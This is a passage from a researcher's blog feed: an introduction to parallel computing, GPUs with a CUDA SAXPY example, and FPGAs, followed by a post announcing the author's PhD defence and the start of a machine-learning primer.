<p><strong>Figure 1:</strong> Demonstration of Amdahl’s law for the theoretical maximum speedup of a computational system, as a function of the fraction of parallelizable code \(\tau\) and the speedup factor \(s\) resulting from the parallelization.</p>

<h3 id="the-cpu-as-a-parallel-processor">The CPU as a Parallel Processor</h3>

<p>From the 1980s until the early 2000s, various methods were developed to increase the computational performance of the CPU. A crucial one was frequency scaling: by increasing the clock frequency of the CPU, more instructions can be executed in the same amount of time. Other methods included reduced instruction sets, out-of-order execution, memory hierarchies and vector processing.</p>

<p>The Dennard scaling law, introduced in 1974 <a href="https://doi.org/10.1109/JSSC.1974.1050511">[Ref]</a>, states that as transistors get smaller, the power consumption of a chip of constant area stays the same even as the number of transistors increases. As transistors became smaller and operating voltages decreased, circuits could run at higher frequencies without increasing power consumption. However, this scaling is considered to have broken down around 2006. Dennard scaling overlooked factors such as the leakage current and the threshold voltage, which set a minimum power requirement per transistor. As transistors shrink, these parameters do not scale proportionally, leading to an increase in power density. This created a so-called “power wall”, as shown in Fig. 2, that practically limited processor frequency to around 4 GHz <a href="https://wgropp.cs.illinois.edu/courses/cs598-s15/">[Ref]</a>, and eventually led Intel to cancel the Tejas and Jayhawk microprocessors in 2004 <a href="https://www.nytimes.com/2004/05/08/business/intel-halts-development-of-2-new-microprocessors.html">[Ref]</a>.</p>
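<p>The ideal scaling argument can be sketched with the standard dynamic-power model (a simplified derivation; static leakage is ignored, which is precisely the term that later broke the scaling). The dynamic power of a circuit is</p>

<p>\[
P = \alpha C V^2 f \,,
\]</p>

<p>where \(\alpha\) is the activity factor, \(C\) the capacitance, \(V\) the supply voltage and \(f\) the clock frequency. Scaling all linear dimensions and the voltage by \(1/\kappa\) gives \(C \to C/\kappa\) and \(V \to V/\kappa\), and allows \(f \to \kappa f\), so the power per transistor scales as \(1/\kappa^2\), while the transistor density grows as \(\kappa^2\): the power per unit area stays constant.</p>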

<p><img src="/assets/hpc-gpu-fpga-intro/power-wall.png" alt="power-wall" /></p>

<p><strong>Figure 2:</strong> Historical evolution of microprocessor clock rates from 1980 to 2012, illustrating the scaling plateau beginning in 2004. This effect demonstrates the breakdown of Dennard scaling and the so-called “power wall”, limiting further gains through increased frequency due to thermal and energy constraints. Figure from <a href="https://wgropp.cs.illinois.edu/courses/cs598-s15/">[Ref]</a>.</p>

<p>To address the problem of power consumption, manufacturers turned to producing power-efficient processors with multiple cores. Each core is independent and can access the same memory concurrently. This design principle brought multi-core processors to the mainstream. By the early 2010s, computers had multiple cores by default, while servers had processors with more than ten cores. By the early 2020s, some processors had over one hundred cores <a href="https://link.springer.com/book/10.1007/978-3-031-28924-8">[Ref]</a>. Moore’s law <a href="https://doi.org/10.1109/JPROC.1998.658762">[Ref]</a>, which predicts that the number of transistors in an integrated circuit doubles roughly every two years, can thus be extrapolated to a doubling of the number of cores per processor.</p>

<p>The operating system ensures that different tasks are performed concurrently by distributing them across the free cores of the processor. However, to unlock the full capacity of the processing unit, the code itself has to be designed in a way that leverages the computational capabilities of multicore architectures <a href="https://link.springer.com/book/10.1007/978-3-031-28924-8">[Ref]</a>.</p>

<h3 id="flynns-taxonomy">Flynn’s Taxonomy</h3>

<p>One of the earliest classifications of parallel computers and programs is the so-called Flynn’s taxonomy <a href="https://doi.org/10.1109/PROC.1966.5273">[Ref]</a>. It categorizes programs based on whether they are operating using a single instruction or multiple instructions, and whether these instructions are executed on one or multiple data.</p>

<p>An entirely sequential program corresponds to the Single Instruction Stream, Single Data Stream (SISD) class. When the same operation is repeated over multiple data, the program falls into the Single Instruction Stream, Multiple Data Stream (SIMD) class, a form of data parallelism. Conversely, when multiple instructions are performed on a single data stream, a form of dataflow parallelism, the program is classified as Multiple Instruction Stream, Single Data Stream (MISD). While systolic arrays are sometimes placed in this category, the class is rare in practice. Multiple Instruction Stream, Multiple Data Stream (MIMD), known as control parallelism, is by far the most common class among modern parallel programs. The taxonomy is summarized in Fig. 3.</p>

<p>In this context, data dependencies are a crucial aspect of implementing parallel code. If each step of a sequence depends on the result of the previous step, the sequence is not parallelizable, since it must be executed in order. However, most algorithms contain portions whose execution can be parallelized. Deep learning algorithms are a notable example.</p>

<p><img src="/assets/hpc-gpu-fpga-intro/flynn.png" alt="flynn" /></p>

<p><strong>Figure 3:</strong> Flynn’s Taxonomy. (a) Single Instruction Stream, Single Data Stream (SISD), (b) Single Instruction Stream, Multiple Data Stream (SIMD), (c) Multiple Instruction Stream, Single Data Stream (MISD), (d) Multiple Instruction Stream, Multiple Data Stream (MIMD). The instruction and data pools are shown, as well as the Processing Units (PUs). Figures from <a href="https://commons.wikimedia.org/wiki/File:SISD.svg">[Ref]</a>, <a href="https://commons.wikimedia.org/wiki/File:SIMD.svg">[Ref]</a>, <a href="https://commons.wikimedia.org/wiki/File:MISD.svg">[Ref]</a> and <a href="https://commons.wikimedia.org/wiki/File:MIMD.svg">[Ref]</a>.</p>

<h2 id="from-video-games-to-the-gpu-architecture">From Video Games to the GPU Architecture</h2>

<p>Since the 1970s, arcade video games had used specialized video hardware to handle graphics, as memory units were expensive. NEC’s μPD7220, one of the first single-chip graphics display processors, remained the best-known such device until the mid-1980s. It supported graphics display monitors of \(1024 \times 1024\) resolution, and laid the foundations for the GPU market <a href="https://link.springer.com/book/9783540169109">[Ref]</a>.</p>

<p>Early 3D graphics emerged in the 1990s in arcades and consoles, and graphics chips started integrating 3D functions. The term GPU was coined by Sony in reference to the 32-bit Sony GPU used in the PlayStation video game console, released in 1994 <a href="https://www.computer.org/publications/tech-news/chasing-pixels/is-it-time-to-rename-the-gpu/">[Ref]</a>. Nvidia and ATI started creating consumer graphics accelerators, leading to the release of Nvidia’s GeForce 256, marketed as the world’s first GPU capable of advanced graphics rendering. These capabilities included tasks such as rasterization, where an image described in a vector graphics format is translated into the array of pixels that best represents it at the available screen granularity. Shading, another essential task for a graphics processor, is the process through which a GPU calculates the appropriate levels of light and color in order to render a 3D scene more realistically. The first GPU capable of programmable shading was the GeForce 3, used in the Xbox console, competing with the chip used in the PlayStation 2.</p>

<p>Nvidia introduced the Compute Unified Device Architecture (CUDA) in 2006, sparking what is now known as General-Purpose Graphics Processing Unit (GPGPU) computing <a href="https://books.google.fr/books?id=49OmnOmTEtQC">[Ref]</a>. This marked a revolution in computing: previously, GPUs were dedicated chips designed to accelerate 3D rendering for gaming and graphics applications. With CUDA, GPUs became programmable parallel processors equipped with hundreds of processing elements, enabling them to perform a broad range of tasks traditionally handled by CPUs: scientific computing (simulations, climate modeling, etc.), financial modeling, signal processing, machine learning and deep learning. For the first time, Nvidia provided a dedicated programming model and language for its GPUs, enabling developers to write general-purpose code that could run directly on the GPU—something that was previously not possible with such flexibility and ease.</p>

<p>CUDA is a proprietary language, which led to the need for a standardized parallel programming language that could be used across GPUs from different manufacturers. In response, OpenCL <a href="https://www.khronos.org/opencl/">[Ref]</a> was defined by Khronos Group as an open standard. It allows the development of code compatible with both GPU and CPU. This emphasis on portability—the ability to write a single kernel that can run across heterogeneous platforms—made OpenCL the second most popular HPC tool at the time <a href="https://sdtimes.com/amd/amd-helps-opencl-gain-ground-in-hpc-space/">[Ref]</a>.</p>

<p>In the 2010s, GPUs were used in consoles such as the PlayStation 4 and the Xbox One <a href="https://www.extremetech.com/gaming/156273-xbox-720-vs-ps4-vs-pc-how-the-hardware-specs-compare">[Ref]</a>, and in automotive systems, after Nvidia partnered with Audi to power car dashboard displays <a href="https://news.softpedia.com/news/NVIDIA-Tegra-Inside-Every-Audi-2010-Vehicle-131529.shtml">[Ref]</a>. Nvidia architectures developed further, increasing the number of CUDA cores and introducing the new technology of so-called tensor cores <a href="https://www.polygon.com/2018/8/20/17760038/nvidia-geforce-rtx-2080-ti-2070-specs-release-date-price-turing">[Ref]</a>, designed to bring better performance to deep learning operations. Real-time ray tracing—simulation of reflections, shadows, depth of field, etc.—debuted with the Nvidia RTX 20 series in 2018 <a href="https://www.nvidia.com/en-us/geforce/news/nvidia-dlss-2-0-a-big-leap-in-ai-rendering/">[Ref]</a>.</p>

<p>In the 2020s, following the deep learning explosion from 2012 onwards, GPUs are heavily used in the training and inference of large language models, such as the ChatGPT <a href="https://openai.com/index/chatgpt/">[Ref]</a> chatbot by OpenAI. This surge in demand for dedicated hardware, infrastructure and electricity to support these heavy models has created a booming artificial intelligence ecosystem. It is also fueling a re-evaluation of our electricity needs, infrastructure organization, and the direction of hardware development, while raising questions about the feasibility of continued scaling.</p>

<h2 id="cuda-programming-model">CUDA Programming Model</h2>

<p>Introduced in 2006 by Nvidia <a href="https://books.google.fr/books?id=49OmnOmTEtQC">[Ref]</a>, CUDA is a parallel programming model designed for developing general purpose applications that leverage the parallelization capabilities and architecture of Nvidia GPUs. It can be thought of as an Application Programming Interface (API) that allows software to access the GPU’s virtual instruction set and parallel computation elements for the execution of compute kernels.</p>

<p>The C++ version of CUDA is a language extension of C++ that allows the programmer to define specific parallel functions called kernels, and to run code on the CPU and the GPU using a single language <a href="https://docs.nvidia.com/cuda/cuda-c-programming-guide/">[Ref]</a>. The code is split into a <em>host</em> (traditional CPU) part and a <em>device</em> (GPU) part: the host dispatches work that is executed on the GPU. The device code is organized into kernels, which are executed by the threads available on the GPU. Multiple threads execute the same kernel simultaneously, in the so-called Single Instruction, Multiple Threads (SIMT) execution model. SIMT can be thought of as a subcategory of SIMD. In SIMD, a single thread executes an instruction on multiple data. In SIMT, a small group of threads called a warp executes the same instruction on multiple data, but each thread has its own independent program counter, stack and registers, so threads can diverge in their execution. This per-thread autonomy gives the SIMT execution model more flexibility.</p>

<h3 id="memory-hierarchy">Memory Hierarchy</h3>

<p>In the CUDA programming model, threads are organized into blocks. In particular, threads that execute the same instruction are grouped into warps, and several warps constitute a thread block. Blocks of threads are further organized into grids. These two levels—blocks and grids—correspond to different communication bandwidths and shared memory capacities. Each block has shared memory accessible to all threads in the block, while threads from different blocks share only the view of the device memory. The model is summarized in Fig. 4.</p>

<p><img src="/assets/hpc-gpu-fpga-intro/threads-blocks.png" alt="threads-blocks" /></p>

<p><strong>Figure 4:</strong> CUDA thread and memory hierarchy. Figure from <a href="https://docs.nvidia.com/cuda/cuda-c-programming-guide/">[Ref]</a>.</p>

<p><img src="/assets/hpc-gpu-fpga-intro/memory.png" alt="memory" /></p>

<p><strong>Figure 5:</strong> Illustration of the memory hierarchy for a Single Instruction, Multiple Threads (SIMT) program. Inspired by <a href="https://jdriven.com/blog/2024/02/gpu_part2/">[Ref]</a>.</p>

<p>Register memory is the fastest kind of memory but also the smallest, usually around 1 KB per thread. Shared memory, on the other hand, is slower, accessible by all the threads within a block, and usually on the order of hundreds of kilobytes. The device memory, slower still, is accessible by all the threads of the device and is what is commonly known as Random Access Memory (RAM). As of 2025, most modern GPUs do not exceed 80 GB of RAM. Finally, the host RAM is the most costly to access in terms of latency. The memory hierarchy is illustrated in Fig. 5, along with Fig. 4.</p>

<h3 id="architecture">Architecture</h3>

<p>The GPU delivers significantly higher instruction throughput and memory bandwidth than the CPU, within a similar cost and power envelope. Many applications, under the umbrella of GPGPU programming, take advantage of these enhanced capabilities. While FPGAs are also energy-efficient, GPUs offer far greater programming flexibility.</p>

<p>This difference stems from fundamental design choices. The CPU is optimized to execute a series of operations by a single thread at the highest clock frequency possible, and can handle a few dozen concurrent threads. In contrast, GPUs are designed to run thousands of threads in parallel, exploiting data parallelism, but at a lower frequency. By trading off individual thread speed, a much higher overall throughput is achieved.</p>

<p>To support this level of parallelism, GPUs devote more transistors to data processing rather than to data caching and control logic. This design philosophy is illustrated in Fig. 6, which compares the typical allocation of resources between a CPU and a GPU.</p>

<p><img src="/assets/hpc-gpu-fpga-intro/cpu-gpu.png" alt="cpu-gpu" /></p>

<p><strong>Figure 6:</strong> Comparison of the allocation of resources between a CPU and a GPU. Figure from <a href="https://docs.nvidia.com/cuda/cuda-c-programming-guide/">[Ref]</a>.</p>

<p>Nvidia’s GPU architecture is built around an array of so-called Streaming Multiprocessors (SMs). A multithreaded program is divided into thread blocks that run independently of one another. When a kernel is launched over several blocks, the blocks are distributed across the available SMs for execution, and an SM can execute multiple blocks simultaneously. On a GPU with more SMs, the program will automatically execute in less time than on a GPU with fewer multiprocessors. In this way, scaling is guaranteed automatically.</p>

<h3 id="c-extension">C++ Extension</h3>

<p>In the C++ version of CUDA, compute kernels are defined as C++ functions using the <code class="language-plaintext highlighter-rouge">__global__</code> declaration specifier. The launch of the kernel is defined using the CUDA execution configuration syntax <code class="language-plaintext highlighter-rouge">&lt;&lt;&lt;K,M&gt;&gt;&gt;(...)</code>. In this way, a kernel is launched on <code class="language-plaintext highlighter-rouge">K</code> blocks per grid, each with <code class="language-plaintext highlighter-rouge">M</code> threads, and is executed in parallel by the active threads. Furthermore, CUDA exposes built-in variables that can be accessed by the developer. In particular, <code class="language-plaintext highlighter-rouge">threadIdx</code> gives the identifier of the thread currently executing and <code class="language-plaintext highlighter-rouge">blockDim</code> gives the block dimension, i.e., the number of threads in each block—<code class="language-plaintext highlighter-rouge">M</code> above. Finally, <code class="language-plaintext highlighter-rouge">blockIdx</code> gives the identifier of the block currently in execution. These three variables are 3-component vectors, providing a natural way to invoke computations on vectors, matrices and volumes.</p>

<p>As an example, Listing 1 presents a CUDA/C++ implementation of “Single-precision A*X Plus Y (SAXPY)” <a href="https://developer.nvidia.com/blog/easy-introduction-cuda-c-and-c/">[Ref]</a>, a basic function of the Basic Linear Algebra Subroutines (BLAS) library. The saxpy function takes two \(n\)-dimensional input vectors, \(\mathbf{x}\) and \(\mathbf{y}\), as well as a scalar \(a\). It computes the expression \(a \times (\mathbf{x})_i + (\mathbf{y})_i\) and stores the result in \(\mathbf{y}\). In the host code, we start by moving the prepared data of \(\mathbf{x}\) and \(\mathbf{y}\) from the host to the device (lines 16, 17). We then invoke the kernel with 4096 blocks of 256 threads each, for a total of 1048576 active threads (line 21). In this way we launch exactly the number of threads needed to process the \(N=1\,048\,576\) elements. Each thread handles one element independently: in the device code, a thread first calculates the index of the element it is responsible for (line 4), checks that this index does not exceed the vector length \(n\) (line 5), and then performs the calculation (line 6). Finally, the result is moved back from the device to the host with another API call (line 24).</p>

<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Device code (kernel definition)</span>
<span class="n">__global__</span> <span class="kt">void</span> <span class="nf">saxpy</span><span class="p">(</span><span class="kt">int</span> <span class="n">n</span><span class="p">,</span> <span class="kt">float</span> <span class="n">a</span><span class="p">,</span> <span class="kt">float</span> <span class="o">*</span><span class="n">x</span><span class="p">,</span> <span class="kt">float</span> <span class="o">*</span><span class="n">y</span><span class="p">)</span>
<span class="p">{</span>
  <span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="n">blockIdx</span><span class="p">.</span><span class="n">x</span><span class="o">*</span><span class="n">blockDim</span><span class="p">.</span><span class="n">x</span> <span class="o">+</span> <span class="n">threadIdx</span><span class="p">.</span><span class="n">x</span><span class="p">;</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">i</span> <span class="o">&lt;</span> <span class="n">n</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">y</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">a</span><span class="o">*</span><span class="n">x</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">+</span> <span class="n">y</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
  <span class="p">}</span>
<span class="p">}</span>

<span class="kt">int</span> <span class="n">main</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
  <span class="c1">// ...</span>
  <span class="kt">int</span> <span class="n">N</span> <span class="o">=</span> <span class="mi">1</span><span class="o">&lt;&lt;</span><span class="mi">20</span><span class="p">;</span> <span class="c1">// 2^20 = 1048576</span>

  <span class="c1">// Copy data from host to device</span>
  <span class="n">cudaMemcpy</span><span class="p">(</span><span class="n">x_device</span><span class="p">,</span> <span class="n">x_host</span><span class="p">,</span> <span class="n">N</span><span class="o">*</span><span class="k">sizeof</span><span class="p">(</span><span class="kt">float</span><span class="p">),</span> <span class="n">cudaMemcpyHostToDevice</span><span class="p">);</span>
  <span class="n">cudaMemcpy</span><span class="p">(</span><span class="n">y_device</span><span class="p">,</span> <span class="n">y_host</span><span class="p">,</span> <span class="n">N</span><span class="o">*</span><span class="k">sizeof</span><span class="p">(</span><span class="kt">float</span><span class="p">),</span> <span class="n">cudaMemcpyHostToDevice</span><span class="p">);</span>

  <span class="c1">// Perform SAXPY on 1M elements</span>
  <span class="c1">// Invoke kernel with 4096 blocks of 256 threads each</span>
  <span class="n">saxpy</span><span class="o">&lt;&lt;&lt;</span><span class="mi">4096</span><span class="p">,</span> <span class="mi">256</span><span class="o">&gt;&gt;&gt;</span><span class="p">(</span><span class="n">N</span><span class="p">,</span> <span class="mf">2.0</span><span class="n">f</span><span class="p">,</span> <span class="n">x_device</span><span class="p">,</span> <span class="n">y_device</span><span class="p">);</span>

  <span class="c1">// Transfer result back to the host</span>
  <span class="n">cudaMemcpy</span><span class="p">(</span><span class="n">y_host</span><span class="p">,</span> <span class="n">y_device</span><span class="p">,</span> <span class="n">N</span><span class="o">*</span><span class="k">sizeof</span><span class="p">(</span><span class="kt">float</span><span class="p">),</span> <span class="n">cudaMemcpyDeviceToHost</span><span class="p">);</span>

  <span class="c1">// ...</span>
<span class="p">}</span>
</code></pre></div></div>
<p><strong>Listing 1:</strong> Saxpy implementation in CUDA C++. Adapted from <a href="https://developer.nvidia.com/blog/easy-introduction-cuda-c-and-c/">[Ref]</a>.</p>

<p>CUDA threads operate on a physically separate device from the host running the C++ program. The kernel is invoked by the host, but it runs on the device. This execution model is illustrated in Fig. 7.</p>

<p><img src="/assets/hpc-gpu-fpga-intro/hetero.png" alt="hetero" /></p>

<p><strong>Figure 7:</strong> Illustration of heterogeneous programming using the CUDA programming model. Adapted from <a href="https://docs.nvidia.com/cuda/cuda-c-programming-guide/">[Ref]</a>.</p>

<h2 id="programmable-logic">Programmable Logic</h2>

<p>While GPUs are programmable parallel processors designed for general-purpose computing, FPGAs are electronic chips that enable the implementation of dedicated parallel architectures. The FPGA grew out of developments in programmable logic, in particular Programmable Read-Only Memory (PROM) and Programmable Logic Devices (PLDs). Both PROMs and PLDs could be programmed outside the factory, i.e., in the field, which explains the “field-programmable” part of the name <a href="https://digilent.com/blog/history-of-the-fpga/">[Ref]</a>.</p>

<p>Altera, founded in 1983, shipped its first reprogrammable logic device, based on erasable programmable ROM technology, in 1984. Xilinx delivered the first commercial field-programmable gate array in 1985, the XC2064. Initially, FPGAs were used mainly in networking and telecommunications; by the end of the 1990s, they had been adopted across consumer, automotive, and industrial applications <a href="https://shop.elsevier.com/books/the-design-warriors-guide-to-fpgas/maxfield/978-0-7506-7604-5">[Ref]</a>. With the AI boom of the 2010s, FPGAs are increasingly being used for applications in constrained environments and for prototyping.</p>

<p>FPGAs are extremely versatile because they are reconfigurable, which allows developers to test numerous designs after the board has been built. When changes to the design are required, a new configuration file, usually called the bitstream, is transferred onto the device and the device is simply restarted.</p>

<p>In particular, FPGAs are crucial in the design of Application-Specific Integrated Circuits (ASICs). The manufacture of ASICs is extremely costly, so before a design is finalized and put into production, it has to be prototyped; the digital hardware design is verified and finalized on the FPGA.</p>

<h2 id="field-programmable-gate-arrays">Field-Programmable Gate Arrays</h2>

<p>The most common FPGA architecture comprises an array of Configurable Logic Blocks (CLBs), Input/Output (I/O) cells, and routing channels <a href="https://doi.org/10.48550/arXiv.2209.11158">[Ref]</a>, as illustrated in Fig. 8. The CLB typically consists of a Lookup Table (LUT) and a clocked Flip-Flop (FF). An LUT with an \(n\)-bit input can encode any Boolean function of \(n\) inputs by simply storing the value of the function for each input, i.e., by storing its truth table. FFs, on the other hand, are used to register the output of the logic function and to synchronize the data with the system clock. By storing the value of a state, sequential logic can be implemented. The routing channels interconnect the logic blocks, and the I/O pads interface with external signals. By “configuring” an FPGA, the developer defines the arrangement of these logic elements and their connections, in order to implement a series of operations such as additions, subtractions and logical operations.</p>

<p>FPGAs are often also equipped with Digital Signal Processing (DSP) blocks, responsible for performing more complex operations such as multiplications and divisions, which become increasingly costly as the bit width of the operands grows. Furthermore, Block RAM (BRAM) is often added on the CLB grid, enabling the storage of large amounts of data inside the FPGA.</p>

<p><img src="/assets/hpc-gpu-fpga-intro/fpga.png" alt="fpga" /></p>

<p><strong>Figure 8:</strong> Illustration of the structure of an FPGA, highlighting its three fundamental digital logic components: Configurable Logic Blocks (CLBs), Input/Output (I/O) pads, and routing channels. Inspired by <a href="https://www.eecg.toronto.edu/~vaughn/challenge/fpga_arch.html">[Ref]</a>.</p>

<h3 id="system-on-a-chip-fpgas">System on a Chip FPGAs</h3>

<p>Often, FPGAs are sold as a System on a Chip (SoC). The SoC is divided into two parts, the Processing System (PS) and the Programmable Logic (PL), as shown in the block diagram in Fig. 9. This type of diagram is a high-level representation showing the main functional components of the FPGA and how they are connected, and is used to understand the internal organization of the chip.</p>

<p>The PS is a traditional CPU, while the PL is the reconfigurable FPGA fabric. SoCs comprise many execution units, which communicate by exchanging data and instructions. A very common data bus for SoCs is ARM’s Advanced Microcontroller Bus Architecture (AMBA) standard. Direct Memory Access (DMA) controllers transfer data directly between external interfaces and the SoC memory, bypassing the CPU or control unit, which enhances the overall data throughput of the SoC.</p>

<p><img src="/assets/hpc-gpu-fpga-intro/ps-pl-soc.png" alt="ps-pl-soc" /></p>

<p><strong>Figure 9:</strong> Block diagram illustration of a System on a Chip (SoC) FPGA, highlighting the division between the processing system and the programmable logic part, as well as the communication between them.</p>

<h3 id="development">Development</h3>

<p>In order to configure FPGAs, a developer uses a specialized computer language called a Hardware Description Language (HDL). This type of language describes the structure and behavior of electronic circuits, usually for ASICs and FPGAs. The design abstraction used is known as Register-Transfer Level (RTL), which models the digital logic circuit in terms of the flow of signals between registers <a href="https://books.google.fr/books?id=-YayRpmjc20C">[Ref]</a>. HDLs differ from ordinary programming languages in that they describe concurrent hardware operations and timing behavior rather than sequential instruction execution. Because of this particularity, FPGA programming is notoriously difficult and comes with a high development cost.</p>

<p>After the RTL description has been validated with test benches, the design is synthesized, translating the RTL description into a gate-level description of the circuit. Finally, the design is placed and routed on the FPGA.</p>

<h3 id="high-level-synthesis">High-Level Synthesis</h3>

<p>To avoid the cost of developing FPGAs directly in HDL, various tools have been designed to abstract away the complexity of configuring them. One particularly well-known approach is High-Level Synthesis (HLS) <a href="https://doi.org/10.1109/5.52214">[Ref]</a>. It is an automated process that takes a high-level description of a digital system, in languages such as C, C++ or MATLAB, and produces an RTL architecture that realizes the given behavior. The code at the algorithmic level is analyzed, architecturally constrained, and scheduled for transcompilation into an RTL design in HDL, which is then typically synthesized to the gate level using a logic synthesis tool.</p>

<h2 id="conclusion">Conclusion</h2>

<p>In this article, I introduced parallelism, briefly summarized the histories of GPUs and FPGAs, and presented the CUDA programming model. I also described the architecture of FPGAs and touched upon the nuances of their design. While CPUs remain the strongest candidate for general-purpose, control-intensive, and sequential tasks, offering flexibility and ease of programming, they lack the ability to parallelize at large scale. GPUs, on the other hand, are well-suited for highly parallel, throughput-oriented tasks, particularly those with structured, data-parallel workloads. FPGAs provide customizable hardware-level parallelism with low latency and high energy efficiency, ideal for real-time and resource-constrained applications; however, their programming complexity remains a significant barrier. This comparison is illustrated in Fig. 10. The choice between the architectures presented depends on many factors, including performance, energy efficiency, flexibility and cost. Understanding the trade-offs between them is crucial for designing optimized pipelines that meet specific requirements on throughput, latency or power consumption.</p>

<p><img src="/assets/hpc-gpu-fpga-intro/flexibility_performance.png" alt="flexibility_performance" /></p>

<p><strong>Figure 10:</strong> Illustration of a comparison of different processor architectures based on their flexibility and their performance potential.</p>

<p>This article is one of the chapters of my PhD thesis titled: <strong>“Real-Time Analysis of Unstructured Data with Machine Learning on Heterogeneous Architectures”</strong>. The full text can be found here: <a href="/news/phd-thesis/">PhD Thesis</a>. In the main results part of this work, GNNs were used to perform the task of track reconstruction, in the context of the Large Hadron Collider (LHC) at CERN.</p>

<p>HPC and parallelism have emerged as essential components of the processing infrastructure at the LHC experiments at CERN. This development is largely driven by the need for Real-Time Analysis (RTA) at increasingly higher data rates. Meeting the stringent requirements for latency and throughput in such environments demands both specialized hardware and modern computing paradigms. Furthermore, specific hardware architectures, such as GPUs and FPGAs, are particularly well suited to exploiting parallelism for real-time analysis in high-energy physics.</p>

<p>The background presented is crucial in understanding the computational aspects of the thesis work as well as the motivations behind it. HPC is particularly motivated by the need to perform RTA, which requires specific hardware and computing paradigms—such as parallel programming—in order to meet the strict latency and throughput constraints imposed by the extreme data rate environments at LHC experiments.</p>]]></content><author><name> </name></author><category term="Blog" /><category term="HPC" /><category term="GPU" /><category term="CUDA" /><category term="FPGA" /><summary type="html"><![CDATA[Brief introduction to parallelism, high-performance computing, GPUs and FPGAs. The histories of GPUs and FPGAs are briefly summarized, and the CUDA programming model is presented.]]></summary></entry><entry><title type="html">PhD Thesis Successfully Defended</title><link href="https://fotisgiasemis.com/news/phd-defense/" rel="alternate" type="text/html" title="PhD Thesis Successfully Defended" /><published>2025-09-07T00:00:00+02:00</published><updated>2025-09-07T00:00:00+02:00</updated><id>https://fotisgiasemis.com/news/phd-defense</id><content type="html" xml:base="https://fotisgiasemis.com/news/phd-defense/"><![CDATA[<p>I successfully defended my PhD thesis on September 5, 2025. The thesis</p>

<blockquote>
  <p><strong>Real-Time Analysis of Unstructured Data with Machine Learning on Heterogeneous Architectures</strong></p>
</blockquote>

<p>explores how modern machine learning models can be deployed efficiently in high-energy physics environments, with a focus on maximizing <strong>throughput</strong> and minimizing <strong>energy</strong> consumption. The page from the day of the defense is <a href="https://indico.in2p3.fr/e/fotis-giasemis-phd-defense">here</a>.</p>

<p><img src="/assets/images/defense-jury.jpg" alt="defense-jury" /></p>

<p>The doctoral committee comprised the following members:</p>

<ul>
  <li><strong>Pierre Astier</strong> (jury president)</li>
  <li><strong>Jean Christophe Prévotet</strong> (reviewer)</li>
  <li><strong>David Rousseau</strong> (reviewer)</li>
  <li><strong>Eluned Anne Smith</strong> (committee member)</li>
  <li><strong>Nicolas Gac</strong> (committee member)</li>
  <li><strong>Vladimir Vava Gligorov</strong> (supervisor)</li>
  <li><strong>Bertrand Granado</strong> (supervisor)</li>
</ul>

<p>You can access the final version of my <strong>thesis</strong> on <a href="https://doi.org/10.48550/arXiv.2508.07423">arXiv</a>, and all the related resources on my earlier post <a href="/news/phd-thesis">PhD Thesis Now Online</a>.</p>

<p><img src="/assets/images/front.png" alt="front" style="width:65%;" /></p>]]></content><author><name> </name></author><category term="News" /><category term="CERN" /><category term="PhD" /><category term="Machine Learning" /><category term="GPU" /><category term="FPGA" /><summary type="html"><![CDATA[Thesis defense: Real-Time Analysis of Unstructured Data with Machine Learning on Heterogeneous Architectures.]]></summary></entry><entry><title type="html">From Machine Learning to Graph Neural Networks and Quantization – An Introduction</title><link href="https://fotisgiasemis.com/blog/ml-gnn-intro/" rel="alternate" type="text/html" title="From Machine Learning to Graph Neural Networks and Quantization – An Introduction" /><published>2025-08-13T00:00:00+02:00</published><updated>2025-08-13T00:00:00+02:00</updated><id>https://fotisgiasemis.com/blog/ml-gnn-intro</id><content type="html" xml:base="https://fotisgiasemis.com/blog/ml-gnn-intro/"><![CDATA[<h2 id="introduction">Introduction</h2>

<p>This post is a short, pedagogical introduction to the field of <strong>Machine Learning (ML)</strong> and its brief history, to its subfields Deep Learning (DL) and <strong>Graph Neural Networks (GNNs)</strong>, and to some important techniques for deploying ML models in <strong>high-throughput</strong> or <strong>resource-constrained</strong> contexts.</p>

<blockquote>
  <p>Parts of this text were inspired by <a href="https://www.deeplearningbook.org">[Ref]</a> and <a href="https://themlbook.com">[Ref]</a>.</p>
</blockquote>

<h2 id="machine-learning">Machine Learning</h2>

<p>Machine learning is the field of how machines—specifically computers—can “learn”. Although “learn” is perhaps a generous term, it refers to how computers manage to do specific tasks without being explicitly programmed to do them. Unlike classical algorithms, which follow hand-crafted rules defined by developers, ML algorithms, and by consequence ML models, are data-driven: by an iterative process of providing data to the ML model, the model is <em>trained</em> and progressively learns to perform a task based solely on the data it has been given. At the end of this process, the model can carry out the task effectively without the developer ever having to explicitly describe the logic of the algorithm itself.</p>

<p>The term machine learning is believed to have been coined by Arthur Samuel in 1959 for his work on programming a computer to play checkers <a href="https://doi.org/10.1147/rd.33.0210">[Ref]</a>. In general, Artificial Intelligence (AI) is considered a more general term than ML, as shown in Fig. 1. Strictly speaking, it refers to the capability of computational systems to mimic tasks which normally require human intelligence, such as learning, reasoning, decision-making, and problem solving. However, the two terms ML and AI are often used interchangeably.</p>

<p><img src="/assets/ml-gnn-intro/ai-ml-dl.png" alt="ai-ml-dl" /></p>

<p><strong>Figure 1:</strong> Euler diagram of AI and its subfields as relevant to this post.</p>

<p>Classical, or probabilistic, ML has been in use long before the term ML came into existence. These algorithms are statistical models that try to capture relationships between various variables. Arguably, the most famous example is linear regression, originally developed by Isaac Newton for his work on the equinoxes around 1700 <a href="https://doi.org/10.1098/rsnr.2005.0096">[Ref]</a>, and later formalized by Legendre and Gauss in the early 19th century <a href="http://archive.org/details/historyofstatist00stig">[Ref]</a>.</p>

<p>The performance of these simple ML algorithms strongly depends on the <em>representation</em> of the data they are given. For example, consider the coordinate system used, as illustrated in Fig. 2: switching from Cartesian to polar coordinates can have a dramatic impact on the performance of an algorithm on a specific task. Each piece of information included in the representation of a data class (the coordinates \(x \), \(y \) and \(r \), \(\theta \) in our example in Fig. 2) is known as a <em>feature</em>. Linear regression tries to capture the relationship between these features, the independent variables, and the dependent variables. However, it cannot influence our choice of which features to use.</p>

<p><img src="/assets/ml-gnn-intro/coordinate_transform.png" alt="coordinate_transform" /></p>

